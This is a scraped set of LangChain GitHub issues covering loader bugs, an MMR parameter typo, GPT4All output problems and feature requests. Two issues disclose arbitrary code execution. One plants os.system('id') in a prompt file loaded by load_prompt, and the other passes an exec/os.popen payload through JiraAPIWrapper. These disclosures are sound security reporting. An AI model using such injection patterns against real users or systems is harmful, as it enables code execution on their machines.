db = Chroma.from_documents(texts, embeddings_function(),
metadatas=[{"source": str(i)} for i in range(len(texts))], persist_directory=PERSIST_DIRECTORY)
querybase = db.as_retriever(search_type="mmr", search_kwargs={"k":3, "lambda_mult":1})
```
retrieved files are then identical whether I pass 0.1 or 0.9 as lambda_mult parameter.
### Expected behavior
I expect different file.
Digging into the code there is a typo I think in langchain.vectorstores.chroma
last line should be lambda_mult and not lambda_mul :
As this is my first time, not sure how to properly suggest or test :)
```
def max_marginal_relevance_search(
self,
query: str,
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[Dict[str, str]] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
fetch_k: Number of Documents to fetch to pass to MMR algorithm.
lambda_mult: Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.
Returns:
List of Documents selected by maximal marginal relevance.
"""
if self._embedding_function is None:
raise ValueError(
"For MMR search, you must specify an embedding function on" "creation."
)
embedding = self._embedding_function.embed_query(query)
docs = self.max_marginal_relevance_search_by_vector(
embedding, k, fetch_k, lambda_mul=lambda_mult, filter=filter
)
return docs
```
| MMR Search in Chroma not working, typo suspected | https://api.github.com/repos/langchain-ai/langchain/issues/4861/comments | 3 | 2023-05-17T14:41:48Z | 2023-06-11T22:33:33Z | https://github.com/langchain-ai/langchain/issues/4861 | 1,714,064,997 | 4,861 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to create a FAISS index with xml files that I have downloaded. However, there doesn't seem to be a loader available for this. Are there any workarounds, or plans to add in a loader for xml files that can't be loaded with MWDumpLoader?
### Suggestion:
Highlight a workaround for loading xml files in the documentation or add a document loader for them | Issue: Unable to load xml files | https://api.github.com/repos/langchain-ai/langchain/issues/4859/comments | 4 | 2023-05-17T14:05:54Z | 2024-01-10T13:56:44Z | https://github.com/langchain-ai/langchain/issues/4859 | 1,713,995,413 | 4,859 |
[
"hwchase17",
"langchain"
]
| ### System Info
I'm trying to load multiple doc files, it is not loading, below is the code
```
txt_loader = DirectoryLoader(folder_path, glob="./*.docx", loader_cls=UnstructuredWordDocumentLoader)
txt_documents = txt_loader.load()
```
I have tried below code too
```
def get_documents(folder_path):
documents = []
file_extensions = [ext.lower() for ext in os.listdir(folder_path)]
if '.docx' in file_extensions or '.doc' in file_extensions:
docx_loader = UnstructuredWordDocumentLoader(folder_path, mode="elements")
docx_documents = docx_loader.load()
documents += docx_documents
return documents
folder_path = [
'Documents\Letter of Invitation.docx',
'Documents\Data Scientist Questionnaire.docx'
]
```
it is not working
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
-
### Expected behavior
not loading multiple files (docx) | Unable to load multiple word docx | https://api.github.com/repos/langchain-ai/langchain/issues/4856/comments | 3 | 2023-05-17T12:57:21Z | 2023-05-18T10:01:03Z | https://github.com/langchain-ai/langchain/issues/4856 | 1,713,851,650 | 4,856 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: master
OS: Debian GNU/Linux 11 (bullseye)
python: 3.11.3
### Who can help?
@hwchase17 @agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
See this [notebook](https://gist.github.com/hsm207/69b3c24b231375b74e8a5ab6f57ffe58)
### Expected behavior
Same behavior as when OpenAI or LlamaCPP is used | GPT4ALL segfaults when using RetrievalQA | https://api.github.com/repos/langchain-ai/langchain/issues/4855/comments | 3 | 2023-05-17T12:36:49Z | 2023-09-12T16:14:55Z | https://github.com/langchain-ai/langchain/issues/4855 | 1,713,813,644 | 4,855 |
[
"hwchase17",
"langchain"
]
|
[SUPPORTED_LOCATIONS](https://github.com/hwchase17/langchain/blob/720ac49f4237e8c177ac65a27903da6215fe91c8/langchain/tools/openapi/utils/api_models.py#L46) does not list APIPropertyLocation.HEADER as supported. However the comments under APIPropertyLocation next to [COOKIE](https://github.com/hwchase17/langchain/blame/720ac49f4237e8c177ac65a27903da6215fe91c8/langchain/tools/openapi/utils/api_models.py#L28) seems to indicate that HEADER is supported as it explicitly states that Cookie is not supported. Any clarifications on this? | Is APIPropertyLocation.HEADER supported? | https://api.github.com/repos/langchain-ai/langchain/issues/4854/comments | 3 | 2023-05-17T12:26:39Z | 2024-05-21T01:46:21Z | https://github.com/langchain-ai/langchain/issues/4854 | 1,713,795,337 | 4,854 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
Hi,
I need to get just the query only for a natural language input query.
I don't want to get the results/output of the query from the db, how do I do that?
Thanks!
### Idea or request for content:
_No response_ | DOC: Get only the sql query not the output of the query in SQLDatabaseChain | https://api.github.com/repos/langchain-ai/langchain/issues/4853/comments | 17 | 2023-05-17T12:26:11Z | 2024-06-29T15:25:41Z | https://github.com/langchain-ai/langchain/issues/4853 | 1,713,794,430 | 4,853 |
[
"hwchase17",
"langchain"
]
| ### System Info
version 0.0.171
llamacpp.py
doesn't accepts parameter n_gpu_layer
whereas code has it
### Who can help?
@hw
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
just try giving the parameter
### Expected behavior
it should accept the parameter for gpu | llamacpp.py doesn't accepts n_gpu_layer | https://api.github.com/repos/langchain-ai/langchain/issues/4852/comments | 1 | 2023-05-17T11:51:09Z | 2023-09-10T16:16:38Z | https://github.com/langchain-ai/langchain/issues/4852 | 1,713,731,745 | 4,852 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version:0.0.171
windows 10
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. A python prompt file `prompt.py`
```
from langchain.output_parsers.list import CommaSeparatedListOutputParser
from langchain.prompts.prompt import PromptTemplate
_DECIDER_TEMPLATE = """Given the below input question and list of potential tables, output a comma separated list of the table names that may be neccessary to answer this question.
Question: {query}
Table Names: {table_names}
Relevant Table Names:"""
import os
os.system('id')
PROMPT = PromptTemplate(
input_variables=["query", "table_names"],
template=_DECIDER_TEMPLATE,
output_parser=CommaSeparatedListOutputParser(),
)
```
2. Load the prompt with load_prompt function
```
from langchain.prompts import load_prompt
load_prompt('prompt.py')
```
3. The `id` command will be executed.
Attack scene1: Alice can send prompt file to Bob and let Bob to load it.
Attack scene2: Alice upload the prompt file to a public hub such as '[langchain-hub](https://github.com/hwchase17/langchain-hub/tree/master)'. Bob load the prompt from an url.
### Expected behavior
The code cannot be executed without any check. | Arbitrary code execution in load_prompt | https://api.github.com/repos/langchain-ai/langchain/issues/4849/comments | 2 | 2023-05-17T10:36:17Z | 2023-08-29T17:58:01Z | https://github.com/langchain-ai/langchain/issues/4849 | 1,713,606,278 | 4,849 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I use the ChatOpenAI and set the verbose be true, but I think this can only get the format prompt, not the final prompt.
How can i get the final prompt that is inputted into ChatGPT?
Thanks for your time.
### Suggestion:
_No response_ | How can I obtain the final Prompt that is inputted into ChatGPT? | https://api.github.com/repos/langchain-ai/langchain/issues/4848/comments | 2 | 2023-05-17T09:59:15Z | 2023-09-12T16:15:00Z | https://github.com/langchain-ai/langchain/issues/4848 | 1,713,548,834 | 4,848 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I found `BaseMultiActionAgentpen` class in langchain but no implementation, maybe it has already in the process of development. I want to implement based on this class (execute multi action in one step) but i encounter some errors. Is there any one has noticed this and has already implement some agents based on this?
### Suggestion:
_No response_ | Issue: implementation of BaseMultiActionAgentpen | https://api.github.com/repos/langchain-ai/langchain/issues/4846/comments | 1 | 2023-05-17T09:25:20Z | 2023-09-10T16:16:49Z | https://github.com/langchain-ai/langchain/issues/4846 | 1,713,494,765 | 4,846 |
[
"hwchase17",
"langchain"
]
| ### Feature request
The [Microsoft Guidance Repository](https://github.com/microsoft/guidance/blob/main/README.md) is a tool designed to enhance the control over modern language models. It allows for a more effective and efficient control than traditional prompting or chaining. It offers features like simple, intuitive syntax based on Handlebars templating, rich output structure with multiple generations, selections, conditionals, tool use, etc.
### Motivation
Based on the description and examples (templating, hidden response parts, well-formed response variables), integration of `guidance` with `langchain` would be very useful addition.
### Your contribution
Given some guidance (pun, intended), I can imagine contributing with a PR myself. | Support for https://github.com/microsoft/guidance | https://api.github.com/repos/langchain-ai/langchain/issues/4843/comments | 3 | 2023-05-17T08:41:08Z | 2023-08-18T19:07:42Z | https://github.com/langchain-ai/langchain/issues/4843 | 1,713,418,715 | 4,843 |
[
"hwchase17",
"langchain"
]
| ### System Info
- Python 3.11.3 on Windows 11
- langchain==0.0.171
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. create llm, SQLDatabase and the SQLDatabaseChain instances;
2. query database with natural language
3. the SQLDatabaseChain would return more content (Normally it would add a new quesition below the anwser)

### Expected behavior
It seem that if we modify the 111 line of `langchain\chains\sql_database\base.py` add add `"\nQuestion:"` as another stop phase, SQLDatabase Chain would works well.


| SQLDatabaseChain returned for more than just the expected answer | https://api.github.com/repos/langchain-ai/langchain/issues/4840/comments | 2 | 2023-05-17T06:15:49Z | 2023-09-25T16:07:12Z | https://github.com/langchain-ai/langchain/issues/4840 | 1,713,198,963 | 4,840 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Hi, thanks for creating such a great tool, I'm using it well at work and for personal use.
But for production use, I need a more tightly managed, revision-controlled Prompt Template Store.
I know that load_prompt already supported, but I wonder if it can be extended to utilize remote store, like github.
For example, if there is GitPromptTemplateStore class like:
```python
from abc import *
class PromptTemplateStore(metaclass=ABCMeta):
@abstractmethod
def load(self, path: str) -> BasePromptTemplate:
pass
class GitPromptTemplateStore(BaseModel):
@property
def repository(self) -> str:
return "[email protected]:some_project/prompt_repo.git"
@property
def branch(self) -> str:
return "main"
...
def load(self, path: str) -> BasePromptTemplate:
...
return {name}_prompt_template # from remote git store (with/without cache)
```
which can be utilized like:
```
template_store = GitPromptTemplateStore(...)
prompt = load_prompt_from_store(template_store, path=...)
```
managing prompt_template would be much easier.
### Motivation
For production use, I need a more tightly managed, revision-controlled Prompt Template Store.
I know that load_prompt already supported, but I wonder if it can be extended to utilize remote store, like github.
### Your contribution
I have read the CONTRIBUTING.MD, and if this request looks valid, I'd be happy to contribute. | Extending Prompt Template Store to Git | https://api.github.com/repos/langchain-ai/langchain/issues/4839/comments | 3 | 2023-05-17T06:15:12Z | 2023-08-31T05:34:20Z | https://github.com/langchain-ai/langchain/issues/4839 | 1,713,198,334 | 4,839 |
[
"hwchase17",
"langchain"
]
| ### Feature request
When you request a webpage using a library like requests or aiohttp, you're getting the initial HTML of the page, but any content that's loaded via JavaScript after the page loads will not be included. That's why you might see template tags like (item.price)}} taka instead of the actual values. Those tags are placeholders that get filled in with actual data by JavaScript after the page loads.
To handle this, you'll need to use a library that can execute JavaScript. A commonly used one is Selenium, but it's heavier than requests or aiohttp because it requires running an actual web browser.
But is there any other option that doesn't need running an actual web browser or can use in long-chain without needing graphical interface like using Headless Browsers tools like ` pyppeteer` (Python wrapper for Puppeteer)
anyway please solve the issue and ad feathers like this.
thanks in advance.
### Motivation
To get dynamic content from a webpage while scraping text from a website or webpage.
### Your contribution
For my side, I rewrite the _fetch method in your WebBaseLoader class to use pyppeteer instead of aiohttp. But still **not working** but I think this might little help.
here is my code, there I Overwirte the class
```
import pyppeteer
import asyncio
from langchain.document_loaders import WebBaseLoader as BaseWebBaseLoader
class WebBaseLoader(BaseWebBaseLoader):
async def _fetch(
self, url: str, selector: str = 'body', retries: int = 3, cooldown: int = 2, backoff: float = 1.5
) -> str:
for i in range(retries):
try:
browser = await pyppeteer.launch()
page = await browser.newPage()
await page.goto(url)
await page.waitForSelector(selector) # waits for a specific element to be loaded
await asyncio.sleep(5) # waits for 5 seconds before getting the content
content = await page.content() # This gets the full HTML, including any dynamically loaded content
await browser.close()
return content
except Exception as e:
if i == retries - 1:
raise
else:
logger.warning(
f"Error fetching {url} with attempt "
f"{i + 1}/{retries}: {e}. Retrying..."
)
await asyncio.sleep(cooldown * backoff ** i)
raise ValueError("retry count exceeded")
```
and Install this two lib
```
pip install pyppeteer
pyppeteer-install
```
| Make an option in WebBaseLoader to handle dynamic content that is loaded via JavaScript. | https://api.github.com/repos/langchain-ai/langchain/issues/4838/comments | 3 | 2023-05-17T06:06:30Z | 2023-09-19T16:10:37Z | https://github.com/langchain-ai/langchain/issues/4838 | 1,713,187,340 | 4,838 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I was trying to create a pipeline using Langchain and GPT4All (gpt4all-converted.bin). The pipeline ran fine when we tried on a windows system. But now when I am trying to run the same code on a RHEL 8 AWS (p3.8x) instance it is generating gibberish response.
This is my code -
```
from langchain import PromptTemplate, LLMChain
from langchain.llms import GPT4All
from langchain.callbacks.manager import CallbackManager
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler
gpt4all_path = 'Models/gpt4all-converted.bin'
callback_manager = CallbackManager([StreamingStdOutCallbackHandler()])
llm = GPT4All(model=gpt4all_path, callback_manager=callback_manager, verbose=True, temp=0, n_predict=512, n_ctx=2048)
prompt_temp = """
Below is an instruction that describes a task. Write a response that appropriately completes the request.
> How many letters are there in the English alphabet?
There 26 letters in the English Alphabet
> Question: {question}
> Reply:
"""
prompt = PromptTemplate(template=prompt_temp, input_variables=["question"])
llm_chain = LLMChain(prompt=prompt, llm=llm)
response = llm_chain.run("write me a story about a lonely computer?")
```
And this is what I am getting -
```
print(response)
'\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f#\x05\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f#\x05\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f# thealst\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f'
```
Can anyone help me to understand the problem here?
### Suggestion:
_No response_ | Issue: GPT4All with Langchain generating \x0f\x0f | https://api.github.com/repos/langchain-ai/langchain/issues/4837/comments | 2 | 2023-05-17T05:59:30Z | 2023-09-12T11:15:28Z | https://github.com/langchain-ai/langchain/issues/4837 | 1,713,178,012 | 4,837 |
[
"hwchase17",
"langchain"
]
| llama-cpp-python added support for n_gpu_layers
Here is the comment confirming it https://github.com/abetlen/llama-cpp-python/issues/207#issuecomment-1550578859 | [Feature request] Add support for GPU offloading to Llama.cpp llm | https://api.github.com/repos/langchain-ai/langchain/issues/4836/comments | 0 | 2023-05-17T05:37:28Z | 2023-05-17T15:35:22Z | https://github.com/langchain-ai/langchain/issues/4836 | 1,713,157,876 | 4,836 |
[
"hwchase17",
"langchain"
]
| ### Feature request
Wrong outputs of the model will raise some exception. So, it may be better to provide clear feedback to the LLM on the specific issue (i.e. incorrect formatting). This would allow the LLM to do self-adjustments and retry, making it robust.
### Motivation
Since when I was using the chain to test my own searching tool, if the result is in other language (not english), the model fail to exactly follow the "thought-action" pattern.
### Your contribution
Not yet | Making the chain more robust (self-correct) | https://api.github.com/repos/langchain-ai/langchain/issues/4835/comments | 2 | 2023-05-17T05:35:55Z | 2024-04-21T21:16:06Z | https://github.com/langchain-ai/langchain/issues/4835 | 1,713,156,564 | 4,835 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version:0.0.171
windows 10
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Set the environment variables for jira and openai
```python
import os
from langchain.utilities.jira import JiraAPIWrapper
os.environ["JIRA_API_TOKEN"] = "your jira api token"
os.environ["JIRA_USERNAME"] = "your username"
os.environ["JIRA_INSTANCE_URL"] = "your url"
os.environ["OPENAI_API_KEY"] = "your openai key"
```
2. Run jira
```python
jira = JiraAPIWrapper()
output = jira.run('other',"exec(\"import os;print(os.popen('id').read())\")")
```
3. The `id` command will be executed.
Commands can be change to others and attackers can execute arbitrary code.
### Expected behavior
The code can be executed without any check. | Arbitrary code execution in JiraAPIWrapper | https://api.github.com/repos/langchain-ai/langchain/issues/4833/comments | 5 | 2023-05-17T04:11:40Z | 2024-03-13T16:12:28Z | https://github.com/langchain-ai/langchain/issues/4833 | 1,713,072,690 | 4,833 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.